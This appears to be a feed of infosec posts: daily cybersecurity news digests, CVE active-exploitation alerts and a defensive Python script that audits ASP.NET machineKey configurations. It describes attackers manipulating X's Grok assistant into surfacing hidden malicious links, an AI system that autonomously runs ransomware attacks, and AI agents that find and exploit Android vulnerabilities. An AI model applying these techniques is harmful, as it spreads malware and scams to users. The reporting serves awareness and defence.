- NYU researchers developed "Ransomware 3.0," an AI system that autonomously performs all four phases of a ransomware attack, generating polymorphic, victim-specific Lua scripts and personalised ransom notes.
- This proof-of-concept, dubbed "PromptLock" by ESET after being uploaded to VirusTotal, demonstrated how AI can create highly targeted and difficult-to-detect ransomware.
- While the current binary won't function outside a lab, the ease with which AI models can generate malicious code for individual tasks, which then combine into a full attack, signals an inevitable future where AI-driven ransomware becomes a real-world threat.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

AI Agents Automate Android Bug Hunting πŸ“±

- Researchers from Nanjing University and The University of Sydney have developed A2, an AI agent system for automated vulnerability discovery and validation in Android apps.
- A2, using commercial AI models like OpenAI o3 and Gemini, emulates human bug hunters, achieving 78.3% coverage on the Ghera benchmark and finding 104 true-positive zero-day vulnerabilities in production APKs, 57 of which were self-validated with PoC exploits.
- This system significantly reduces false positives by validating findings, offering a cost-effective and fast alternative to traditional static analysis tools, and signals a potential "explosion" in both defensive research and offensive exploitation.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Microsoft Enforces MFA for Azure Portal Sign-ins 🛡️

- Microsoft has successfully enforced multifactor authentication (MFA) for Azure Portal sign-ins across all tenants since March 2025, following earlier announcements.
- This initiative will expand to Azure CLI, PowerShell, SDKs, and APIs in October 2025, aiming to protect user accounts against cyber threats.
- MFA significantly reduces account compromise risk (by over 99%), reinforcing Microsoft's commitment to a more secure future by making strong authentication mandatory for administrative access.

🤖 Bleeping Computer | bleepingcomputer.com/news/micr

#CyberSecurity #ThreatIntelligence #Vulnerability #RCE #ZeroDay #ActiveExploitation #Ransomware #Malware #APT #SupplyChainAttack #Phishing #SocialEngineering #AI #MFA #InfoSec #IncidentResponse

2025-09-04

Hello cyber pros! It's been a busy 24 hours with some significant breaches, critical vulnerabilities, new threat actor tactics, and a flurry of data privacy and regulatory news. Let's dive in:

Recent Cyber Attacks and Breaches 🚨

- Tire giant Bridgestone Americas confirmed a cyberattack impacting some North American manufacturing facilities. The company believes its rapid response contained the incident early, preventing customer data theft or deep network infiltration.
- Texas is suing education tech provider PowerSchool following a December 2024 data breach that exposed sensitive information for 62.4 million students and 9.5 million teachers. The lawsuit alleges deceptive trade practices and failure to protect data, especially given the lack of MFA prior to the breach and subsequent extortion attempts despite a ransom payment.
- Chess.com disclosed a data breach affecting a third-party file transfer application, exposing personal identifiable information (PII) for over 4,500 users. The platform's core infrastructure and financial data were reportedly unaffected, and there's no evidence of public disclosure or misuse yet.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🗞️ The Record | therecord.media/powerschool-da
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🗞️ The Record | therecord.media/chess-platform

New Threat Research & Actor Activity 🕵️‍♀️

- Threat actors are "Grokking" X's AI assistant to bypass malvertising protections and spread malicious links. They hide links in video ad metadata, then prompt Grok to reveal them in a clickable format, leveraging Grok's trusted status to amplify scams and malware.
- Russian state-sponsored APT28 (aka Fancy Bear) is deploying a new Microsoft Outlook backdoor called "NotDoor" against companies in NATO countries. This VBA macro monitors incoming emails for trigger words, enabling data exfiltration, file uploads, and command execution, often delivered via DLL side-loading through onedrive.exe.
- A new China-aligned cybercrime group, GhostRedirector, has compromised at least 65 Windows servers globally using custom malware (Rungan backdoor and Gamshen IIS trojan) for SEO fraud. They manipulate Google search results to boost gambling site rankings by showing Googlebot fake backlinks and modified content.
- The US State Department has placed a $10 million bounty on three Russians accused of being FSB intelligence agents (Berserk Bear/Dragonfly) for attacking critical infrastructure. They allegedly exploited an old Cisco flaw (CVE-2018-0171) and deployed "SYNful Knock" malware to target energy companies and nuclear plants.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
📰 The Hacker News | thehackernews.com/2025/09/cybe
📰 The Hacker News | thehackernews.com/2025/09/russ
🕵🏼 The Register | go.theregister.com/feed/www.th
🕵🏼 The Register | go.theregister.com/feed/www.th

Vulnerabilities: Zero-Days & Active Exploitation ⚠️

- CISA has added two TP-Link router flaws, CVE-2023-50224 (authentication bypass) and CVE-2025-9377 (OS command injection), to its KEV catalog, confirming active exploitation by the Quad7 botnet. Additionally, a new unpatched zero-day (stack-based buffer overflow in CWMP) affecting multiple TP-Link router models (e.g., Archer AX10/AX1500) has been confirmed, allowing remote code execution.
- A critical zero-day vulnerability (CVE-2025-53690) in Sitecore, stemming from the reuse of sample ASP.NET machine keys from old documentation, has been actively exploited. Attackers leveraged this ViewState deserialization flaw to achieve remote code execution and deploy reconnaissance malware (WeepSteel), network tunneling tools (Earthworm), and remote access tools (Dwagent).

📰 The Hacker News | thehackernews.com/2025/09/cisa
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🤫 CyberScoop | cyberscoop.com/sitecore-zero-d
🤖 Bleeping Computer | bleepingcomputer.com/news/secu

Threat Landscape Commentary 🇺🇦

- Ukraine's cyber chief, Oleksandr Potii, noted a decrease in "critical" Russian cyberattacks due to stronger Ukrainian defences, but an increase in non-critical operations like espionage and DDoS. He anticipates a return to targeting energy grids this winter, emphasising strong cooperation with US and European partners for intelligence sharing and tool deployment.

πŸ—žοΈ The Record | therecord.media/ukraine-cyber-

Data Privacy & Regulatory Fines πŸ”’

- The European General Court rejected a challenge to the EU-U.S. Data Privacy Framework (DPF), affirming that the US adequately safeguards Europeans' personal data. This decision provides relief and bolsters confidence for thousands of companies relying on the framework for data transfers.
- France's CNIL has levied significant fines against Google (€325 million) and SHEIN (€150 million) for violating cookie consent regulations. Both companies were found to have placed advertising cookies without proper user consent, and Google was also fined for displaying ads within Gmail without explicit permission.
- A US federal jury awarded $425 million against Google in a class-action lawsuit, finding the tech giant invaded the privacy of millions by collecting user data even after they had turned off app activity tracking. Google plans to appeal the decision.
- The US FTC has taken action against Disney ($10 million fine) and robot toy maker Apitor Technology for violating the Children's Online Privacy Protection Rule (COPPA). Disney failed to label "Made for Kids" YouTube videos, leading to data collection from children, while Apitor allowed a third-party to collect children's geolocation data without consent.

πŸ—žοΈ The Record | therecord.media/european-court
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ“° The Hacker News | thehackernews.com/2025/09/goog
πŸ—žοΈ The Record | therecord.media/shein-google-f
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ—žοΈ The Record | therecord.media/google-hit-wit

Regulatory Issues & Government Programs 🏛️

- A US Congressional panel has advanced two critical cyber bills, throwing a lifeline to threat intelligence sharing and state/local funding. The WIMWIG Act would extend the Cybersecurity Information Sharing Act of 2015 for 10 years, and the PILLAR Act would reauthorize the State and Local Cybersecurity Grant Program, both now including provisions for AI.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

#CyberSecurity #ThreatIntelligence #Ransomware #DataBreach #Vulnerability #ZeroDay #ActiveExploitation #APT #Malware #DataPrivacy #Regulatory #InfoSec #CyberAttack #IncidentResponse
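The Sitecore item under "Vulnerabilities" above describes the root cause in one line: a static ASP.NET machineKey copied from sample documentation lets anyone who has read that documentation forge a validly signed ViewState payload, which the server then deserializes. The following is an added example, not code from the post or from Sitecore, showing the kind of configuration audit a defender can run over a web.config before an attacker does. The sample key strings and the web.config fragments are constructed placeholders; the set of known sample keys must be filled from the actual documentation you care about.

```python
"""
Added example: audit the machineKey section of an ASP.NET web.config for
documentation-copied keys, weak ViewState algorithms and disabled MAC checks.
Sample keys and configs below are constructed placeholders, not real values.
"""
import xml.etree.ElementTree as ET

# Constructed placeholders: replace with the exact strings from the vendor
# documentation in question before running this against real configs.
KNOWN_SAMPLE_KEYS = {
    "CONSTRUCTED-SAMPLE-VALIDATION-KEY-0000",
    "CONSTRUCTED-SAMPLE-DECRYPTION-KEY-0000",
}
# MAC and cipher choices that should no longer protect ViewState.
WEAK_VALIDATION = {"MD5", "SHA1"}
WEAK_DECRYPTION = {"DES", "3DES"}


def _key_value(raw: str) -> str:
    """Drop a ',IsolateApps'-style modifier so only the key material is compared."""
    return raw.split(",")[0].strip()


def audit_machine_key(config_xml: str) -> list[str]:
    """Return a list of findings for one web.config; an empty list means nothing flagged."""
    root = ET.fromstring(config_xml)
    findings: list[str] = []
    mk = root.find("system.web/machineKey")
    if mk is None:
        # No static element: ASP.NET auto-generates per-machine keys, so
        # there is no documentation-copied secret for an attacker to reuse.
        return findings

    for attr in ("validationKey", "decryptionKey"):
        raw = mk.get(attr, "AutoGenerate")
        if raw.upper().startswith("AUTOGENERATE"):
            continue
        if _key_value(raw) in KNOWN_SAMPLE_KEYS:
            findings.append(f"{attr} matches a published sample key; rotate it")

    # .NET 4.x defaults to HMACSHA256 when the attribute is absent.
    if mk.get("validation", "HMACSHA256").upper() in WEAK_VALIDATION:
        findings.append(f"validation={mk.get('validation')} is a weak ViewState MAC")
    if mk.get("decryption", "Auto").upper() in WEAK_DECRYPTION:
        findings.append(f"decryption={mk.get('decryption')} is a weak ViewState cipher")

    pages = root.find("system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("enableViewStateMac=false disables ViewState integrity checks entirely")
    return findings


# Constructed web.config fragments used as sample input.
WEAK_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="CONSTRUCTED-SAMPLE-VALIDATION-KEY-0000"
                decryptionKey="CONSTRUCTED-SAMPLE-DECRYPTION-KEY-0000"
                validation="SHA1" decryption="3DES" />
    <pages enableViewStateMac="false" />
  </system.web>
</configuration>"""

HARDENED_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

NO_MACHINEKEY_CONFIG = """<configuration>
  <system.web>
    <compilation debug="false" />
  </system.web>
</configuration>"""


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG),
                       ("no machineKey", NO_MACHINEKEY_CONFIG)):
        print(f"[{label}]")
        for finding in audit_machine_key(cfg) or ["no findings"]:
            print("  -", finding)
```

Run it over every web.config (and any transformed web.Release.config) in a deployment; a key that appears in more than one unrelated deployment is a strong hint it was copied from a shared source rather than generated, even when it is not in the known-sample set.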

2025-04-16

Update your #Apple devices ASAP. Two vulnerabilities, CVE-2025-31200 and CVE-2025-31201, have been fixed: support.apple.com/en-us/122282

"Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on iOS."

While iOS has been known to be targeted, the fixes are available for all Apple devices and should be installed as soon as possible.

#activeexploitation #CVE_2025_31200 #CVE_2025_31201

2025-03-02

Security researchers discover vulnerabilities in #Paragon Partition Manager driver used in #activeexploitation

The actively exploited vulnerability is tracked as CVE-2025-0289, and when exploited, allows an attacker to gain administrative privileges and to execute code. An attacker can potentially download the driver onto a device without Paragon Partition Manager installed.

Users are advised to patch ASAP and to enable the Vulnerable Driver Blocklist.

#cybersecurity

bleepingcomputer.com/news/secu

2025-01-31

Security researchers reveal #activeexploitation against #SimpleHelp RMM vulnerabilities

The vulnerabilities are tracked as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, and when exploited, allow an attacker to gain admin privileges.

Administrators are advised to patch ASAP

#cybersecurity #vulnerabilitymanagement

bleepingcomputer.com/news/secu

tricia, queen of house cyberly :verified_paw: :donor:triciakickssaas@infosec.exchange
2025-01-28

pls appreciate i wore an aqua colored sweater to talk about aquabot

🚨Active exploitation attempt🚨
Akamai Security Intelligence and Response Team (SIRT) has identified a new variant of the Mirai-based Aquabot, dubbed Aquabotv3 keeping in line with the naming conventions of the first two.

It is using CVE-2024-41710, a command injection vulnerability that affects Mitel SIP models. There was a POC made public in August 2024, but this is the first time it's been seen actively seeking exploitation ITW.

Not only that! This malware exhibits a behavior we have never before seen with a Mirai variant: a function (report_kill) to report back to the C2 when a kill signal was caught on the infected device.

We (we = the SIRT) have not seen any response from the C2 as of the date this was originally posted (Jan. 28, 2024).

Incredible work Larry Cashdollar and Kyle Lefton 🎉

Full technical analysis including IOCs:
akamai.com/blog/security-resea

#mirai #malware #activeexploitation #security #research #botnet

2025-01-11

#Ivanti has revealed #activeexploitation against a vulnerability in its appliances

The vulnerability is tracked as CVE-2025-0282, and when exploited, allows an attacker to remotely execute code

Administrators are advised to patch ASAP

#cybersecurity

bleepingcomputer.com/news/secu

2025-01-02

Security researchers reveal #activeexploitation of a vulnerability in #FourFaith routers

The vulnerability is tracked as CVE-2024-12856, and when exploited, allows an attacker to inject commands

Administrators are advised to reach out to their Four-Faith contacts for mitigation steps

#cybersecurity

bleepingcomputer.com/news/secu

2024-12-29

#PaloAlto reveals #activeexploitation against vulnerability in its firewall

The vulnerability is tracked as CVE-2024-3393, and when exploited, causes the firewall to reboot

Administrators are advised to patch ASAP, or to apply mitigations if not able to patch

#cybersecurity

bleepingcomputer.com/news/secu

2024-12-22

Security researchers reveal #activeexploitation against a critical #ApacheStruts 2 vulnerability

The vulnerability is tracked as CVE-2024-53677, and when exploited, can allow an attacker to remotely execute code

Administrators are advised to patch ASAP

#cybersecurity

bleepingcomputer.com/news/secu

2024-11-27

Security researchers reveal #activeexploitation against critical vulnerability in Array Networks SSL VPN products

The vulnerability is tracked as CVE-2023-28461, and when exploited, allows an attacker to remotely execute code

Administrators are advised to patch ASAP

#cybersecurity #vulnerabilitymanagement

bleepingcomputer.com/news/secu

2024-11-24

UPDATE: Security researchers reveal over 2000 Palo Alto firewalls have been compromised using these vulnerabilities

#activeexploitation

bleepingcomputer.com/news/secu
